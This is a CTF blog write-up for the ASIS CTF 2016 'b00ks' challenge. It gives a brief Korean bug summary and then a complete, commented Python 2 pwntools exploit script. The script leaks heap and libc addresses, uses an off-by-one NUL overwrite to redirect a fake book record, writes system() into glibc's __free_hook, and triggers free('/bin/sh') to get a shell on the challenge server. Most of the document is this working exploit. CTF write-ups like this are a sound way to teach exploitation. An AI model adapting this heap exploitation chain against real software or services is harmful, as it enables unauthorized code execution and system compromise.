ASIS CTF 2016 books

Games/CTF 2016. 5. 11. 02:46

버그: BSS 쪽에 힙leak 및 off-by-one 존재.  포인터 하위바이트 NULL 로 덮는것으로 시작해서 다른객체 pointer 조작하고 결과적으로 libc free hook 하이잭해서 쉘 획득.  arbitrary free 버그는 fake 임 -_-


# Python 2 / pwntools solver for the ASIS CTF 2016 "b00ks" challenge.
# Python 2 syntax throughout (print statement, raw_input, str.encode('hex')).
# Every sendline answers the prompt that the preceding recvuntil consumed, so
# the statement order below is the protocol itself and cannot be rearranged.
# NOTE: the final stage overwrites a glibc malloc hook; those hooks were removed
# in glibc 2.34, so this whole approach is specific to the older libc shipped
# with the challenge (all libc offsets below are hard-coded for that build).
from pwn import *

# pack() takes its word size from context; 'amd64' makes every pack() call
# below emit an 8-byte little-endian value, which the fake-record layouts
# depend on.
context.arch = 'amd64' # i386 / arm


# Challenge endpoint used during the CTF.
r = remote('books.asis-ctf.ir', 13007)

# Local alternative, kept for debugging against the binary.
#r = process(['./b00ks'])

# Pause so a debugger can be attached before any interaction starts.
raw_input('attach')

# start pwn.


# Author name: exactly 32 bytes. The heap leak below is parsed relative to
# this exact string, so its length and content are load-bearing.
print r.recvuntil('name: ')

r.sendline('A'*32)

print r.recvuntil('> ')


# Menu 1: create book #1 with a 224-byte name and a 32-byte description.
r.sendline('1')

print r.recvuntil('size: ')

r.sendline('224')

print r.recvuntil('chars): ')

payload = ''

payload += 'A'*224

r.sendline(payload)

print r.recvuntil('size: ')

r.sendline('32')

print r.recvuntil('tion: ')

# The 32-byte description is laid out as a fake book record of four 8-byte
# words (id, name ptr, desc ptr, desc size). The pointers stay zero here and
# are filled in once the heap address is known.
payload = ''

payload += pack(31337) # id

payload += pack(0) # name

payload += pack(0) # desc

payload += pack(0) # desc size

r.sendline(payload)

print r.recvuntil('> ')


# leak
# Menu 4 lists the books. The bytes printed right after the 32-'A' author
# name are taken as a little-endian pointer (reverse the bytes, hex-decode).
# Presumably the author buffer is not NUL-terminated and an adjacent heap
# pointer is printed along with it — matches the heap-leak note in the
# write-up; verify against the binary.
r.sendline('4')

leak = r.recvuntil('> ')

heap_addr = int(leak.split('Author: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')[1].split('\n')[0][::-1].encode('hex'),16)

print hex(heap_addr)


# set target address to leak
# Menu 3: edit book 1's description, rewriting the fake record with
# heap-relative pointers. Presumably heap_addr-0x20 ("tricky") points back at
# the fake record's own desc fields, so later edits of "book 31337" rewrite
# their own desc pointer — confirm against the heap layout.
r.sendline('3')

print r.recvuntil('edit: ')

r.sendline('1')

print r.recvuntil('tion: ')

payload = ''

payload += pack(31337)  # id

payload += pack(heap_addr+0x30)       # name  

payload += pack(heap_addr-0x20)       # desc tricky!!

payload += pack(100)       # desc size

r.sendline(payload)

print r.recvuntil('> ')


# overwrite off-by-one
# Menu 5: re-enter the 32-byte author name. Per the write-up this is the
# off-by-one NUL write that clears the low byte of an adjacent pointer so it
# now refers to the fake record stored in book 1's description.
r.sendline('5')

print r.recvuntil('name: ')

r.sendline('A'*32)

print r.recvuntil('> ')


# create free small chunk on the heap
# Book #2 with a 200-byte name and description, then delete it (menu 2, id 2).
# The freed chunk is left holding allocator metadata, which the next listing
# reads through the fake record's redirected 'name' pointer (heap_addr+0x30).
r.sendline('1')

print r.recvuntil('size: ')

r.sendline('200')

print r.recvuntil('chars): ')

r.sendline('C'*200)

print r.recvuntil('size: ')

r.sendline('200')

print r.recvuntil('tion: ')

r.sendline('D'*200)

print r.recvuntil('> ')

r.sendline('2') # delete

print r.recvuntil('delete: ')

r.sendline('2') # free small chunk.

print r.recvuntil('> ')


# Second manual pause: debugger checkpoint before the libc leak.
raw_input()


# trigger bug
# Menu 4 again: the 'Name: ' line of the fake record now yields a pointer into
# glibc's main_arena. Everything derived from it below uses fixed offsets that
# are specific to the challenge's libc build.
r.sendline('4')

leak = r.recvuntil('> ')

libc_main_arena = int(leak.split('Name: ')[1].split('\n')[0][::-1].encode('hex'),16)

# Page-align the leak, rebase to the libc image, and locate the two hooks.
libc_rwbase = libc_main_arena & 0xFFFFFFFFFFFFF000

libc_base = libc_rwbase - 0x3be000

libc_malloc_hook = libc_main_arena - 0x78   # computed and printed only; never written

libc_free_hook = libc_main_arena + 0x2258   # the hook that is actually overwritten below

print hex(libc_free_hook)

print hex(libc_malloc_hook)

print hex(libc_main_arena)

print hex(libc_rwbase)

print hex(libc_base)


# set overwrite target address
# Menu 3 on the fake book (id 31337): install libc_free_hook as its desc
# pointer with a desc length of 100, so the next edit writes through it.
r.sendline('3')

print r.recvuntil('edit: ')

r.sendline('31337')

print r.recvuntil('tion: ')

payload = ''

payload += pack(libc_free_hook)   # desc

payload += pack(100)       # desc len  

r.sendline(payload)

print r.recvuntil('> ')


# Address of system() in the challenge libc (build-specific constant).
system = libc_base + 0x46640

# overwrite libc_malloc_hook
# NOTE: despite the comment above, the pointer installed in the previous step
# is libc_free_hook, so this edit stores system()'s address in __free_hook;
# libc_malloc_hook is never written anywhere in this script.
r.sendline('3')

print r.recvuntil('edit: ')

r.sendline('31337')

print r.recvuntil('tion: ')

payload = ''

payload += pack(system)       # desc

r.sendline(payload)

print r.recvuntil('> ')


# call system("/bin/sh")
# Menu 1: create a book whose name is "/bin/sh", then answer the description
# size with '-1'. Presumably the program's error path frees the name buffer,
# which invokes the overwritten hook with "/bin/sh" as its argument.
r.sendline('1')

print r.recvuntil('size: ')

r.sendline('100')

print r.recvuntil('chars): ')

r.sendline('/bin/sh')

print r.recvuntil('size: ')

r.sendline('-1')


# get shell?

# Hand the connection to the user; if the hook fired, this is a shell prompt.
r.interactive()


Posted by daehee87
